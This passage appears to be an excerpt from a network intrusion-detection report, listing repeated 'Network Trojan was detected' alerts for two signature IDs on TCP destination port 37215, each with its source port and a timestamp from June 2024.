                SID:2835222
                Source Port:60620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409924
                SID:2829579
                Source Port:53848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701496
                SID:2835222
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274436
                SID:2835222
                Source Port:44808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984392
                SID:2829579
                Source Port:50942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670640
                SID:2835222
                Source Port:50800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072152
                SID:2829579
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.053004
                SID:2829579
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017467
                SID:2829579
                Source Port:35692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827596
                SID:2835222
                Source Port:37498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724019
                SID:2829579
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565882
                SID:2829579
                Source Port:55330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182527
                SID:2829579
                Source Port:38494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969177
                SID:2829579
                Source Port:59472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365529
                SID:2829579
                Source Port:39658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882246
                SID:2835222
                Source Port:33720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850138
                SID:2835222
                Source Port:36866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501211
                SID:2835222
                Source Port:38908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624739
                SID:2829579
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967741
                SID:2829579
                Source Port:46072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411157
                SID:2829579
                Source Port:36882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133267
                SID:2835222
                Source Port:36128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452498
                SID:2829579
                Source Port:39722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014423
                SID:2829579
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.181634
                SID:2829579
                Source Port:59944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716821
                SID:2829579
                Source Port:35588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323167
                SID:2835222
                Source Port:54056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325448
                SID:2835222
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848536
                SID:2829579
                Source Port:38144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916548
                SID:2835222
                Source Port:34466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941682
                SID:2829579
                Source Port:34338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289291
                SID:2835222
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830520
                SID:2829579
                Source Port:49574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321886
                SID:2829579
                Source Port:36234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614514
                SID:2835222
                Source Port:33828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779592
                SID:2835222
                Source Port:39614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012835
                SID:2835222
                Source Port:52096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325202
                SID:2829579
                Source Port:60418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667077
                SID:2835222
                Source Port:58810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915815
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159713
                SID:2829579
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164672
                SID:2829579
                Source Port:44726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616699
                SID:2829579
                Source Port:56052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052201
                SID:2835222
                Source Port:38946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.793000
                SID:2835222
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967006
                SID:2829579
                Source Port:40246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027455
                SID:2835222
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343279
                SID:2829579
                Source Port:39564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323541
                SID:2835222
                Source Port:46216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761513
                SID:2829579
                Source Port:52344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766566
                SID:2829579
                Source Port:44426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322841
                SID:2835222
                Source Port:43430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021821
                SID:2835222
                Source Port:56596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114826
                SID:2829579
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830809
                SID:2835222
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132490
                SID:2829579
                Source Port:50228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644391
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979617
                SID:2835222
                Source Port:33112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567550
                SID:2835222
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977372
                SID:2835222
                Source Port:45374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548320
                SID:2835222
                Source Port:44746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227542
                SID:2829579
                Source Port:39678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998572
                SID:2835222
                Source Port:34054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033054
                SID:2835222
                Source Port:36162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727895
                SID:2829579
                Source Port:51248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179454
                SID:2829579
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045758
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504467
                SID:2829579
                Source Port:34996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406694
                SID:2835222
                Source Port:47722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667723
                SID:2835222
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293355
                SID:2835222
                Source Port:51286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881024
                SID:2829579
                Source Port:42430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.735628
                SID:2835222
                Source Port:56454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148878
                SID:2829579
                Source Port:42422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025791
                SID:2829579
                Source Port:58018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202877
                SID:2835222
                Source Port:50414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917151
                SID:2835222
                Source Port:40922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734143
                SID:2829579
                Source Port:40468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410768
                SID:2835222
                Source Port:40586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412227
                SID:2829579
                Source Port:33338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501989
                SID:2835222
                Source Port:41416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828016
                SID:2829579
                Source Port:60922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567036
                SID:2835222
                Source Port:59590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859219
                SID:2829579
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703633
                SID:2829579
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.050916
                SID:2835222
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148818
                SID:2829579
                Source Port:48376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164430
                SID:2829579
                Source Port:56776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897278
                SID:2829579
                Source Port:44224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723275
                SID:2829579
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968899
                SID:2835222
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733335
                SID:2829579
                Source Port:32918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072994
                SID:2835222
                Source Port:57226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617805
                SID:2829579
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625562
                SID:2829579
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091652
                SID:2835222
                Source Port:60060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152866
                SID:2829579
                Source Port:32896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942517
                SID:2829579
                Source Port:60284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850271
                SID:2829579
                Source Port:46208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978763
                SID:2829579
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178064
                SID:2835222
                Source Port:54770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183476
                SID:2835222
                Source Port:49834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699465
                SID:2835222
                Source Port:45608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277395
                SID:2829579
                Source Port:33250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150419
                SID:2829579
                Source Port:59570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847555
                SID:2829579
                Source Port:34658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148785
                SID:2829579
                Source Port:42210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859680
                SID:2829579
                Source Port:50804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915949
                SID:2829579
                Source Port:37174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898056
                SID:2829579
                Source Port:50162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805881
                SID:2835222
                Source Port:38002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022613
                SID:2835222
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716459
                SID:2829579
                Source Port:49438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970953
                SID:2829579
                Source Port:48894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519711
                SID:2829579
                Source Port:37920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164847
                SID:2835222
                Source Port:53444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940803
                SID:2829579
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699275
                SID:2835222
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758888
                SID:2835222
                Source Port:33124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.246330
                SID:2829579
                Source Port:45606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502269
                SID:2829579
                Source Port:48306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914803
                SID:2835222
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159223
                SID:2835222
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734765
                SID:2829579
                Source Port:50180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453792
                SID:2829579
                Source Port:44002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229320
                SID:2829579
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290089
                SID:2829579
                Source Port:43644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015084
                SID:2835222
                Source Port:37374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089675
                SID:2829579
                Source Port:42554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760077
                SID:2829579
                Source Port:48968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763022
                SID:2829579
                Source Port:38868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323352
                SID:2829579
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148456
                SID:2835222
                Source Port:51454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151575
                SID:2829579
                Source Port:60120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907329
                SID:2835222
                Source Port:46868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324821
                SID:2829579
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761215
                SID:2835222
                Source Port:59168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548606
                SID:2829579
                Source Port:35988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849322
                SID:2829579
                Source Port:60796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163258
                SID:2835222
                Source Port:50718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661762
                SID:2835222
                Source Port:55782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054474
                SID:2829579
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862158
                SID:2829579
                Source Port:59412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131190
                SID:2829579
                Source Port:44056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640589
                SID:2829579
                Source Port:53506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084082
                SID:2829579
                Source Port:54982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295328
                SID:2829579
                Source Port:37978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031610
                SID:2835222
                Source Port:36354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164881
                SID:2829579
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016541
                SID:2835222
                Source Port:51454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419619
                SID:2829579
                Source Port:47416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862379
                SID:2829579
                Source Port:39098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368013
                SID:2829579
                Source Port:45666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790502
                SID:2829579
                Source Port:60024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502710
                SID:2835222
                Source Port:51434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368037
                SID:2835222
                Source Port:58954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565351
                SID:2835222
                Source Port:44974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779200
                SID:2835222
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971201
                SID:2835222
                Source Port:43432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944719
                SID:2829579
                Source Port:55384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243306
                SID:2835222
                Source Port:57210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383949
                SID:2835222
                Source Port:44114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084031
                SID:2829579
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030299
                SID:2835222
                Source Port:36618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544007
                SID:2835222
                Source Port:51420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545237
                SID:2835222
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670251
                SID:2829579
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943725
                SID:2829579
                Source Port:46668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148956
                SID:2829579
                Source Port:37206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763700
                SID:2829579
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291315
                SID:2835222
                Source Port:45096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966326
                SID:2835222
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774863
                SID:2835222
                Source Port:40890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977118
                SID:2829579
                Source Port:57124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985364
                SID:2829579
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291228
                SID:2829579
                Source Port:33556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761807
                SID:2835222
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848784
                SID:2829579
                Source Port:57996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807550
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408526
                SID:2829579
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022812
                SID:2835222
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792724
                SID:2829579
                Source Port:55800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504166
                SID:2829579
                Source Port:50642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017857
                SID:2835222
                Source Port:43726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616226
                SID:2835222
                Source Port:54214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018092
                SID:2829579
                Source Port:43026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882736
                SID:2835222
                Source Port:55680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275695
                SID:2829579
                Source Port:56300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343325
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012663
                SID:2829579
                Source Port:37686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967797
                SID:2835222
                Source Port:33004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324725
                SID:2835222
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422844
                SID:2835222
                Source Port:41822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729360
                SID:2835222
                Source Port:55776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940345
                SID:2829579
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737590
                SID:2835222
                Source Port:34840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942702
                SID:2829579
                Source Port:60372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758837
                SID:2829579
                Source Port:50254
                Destination Port:37215
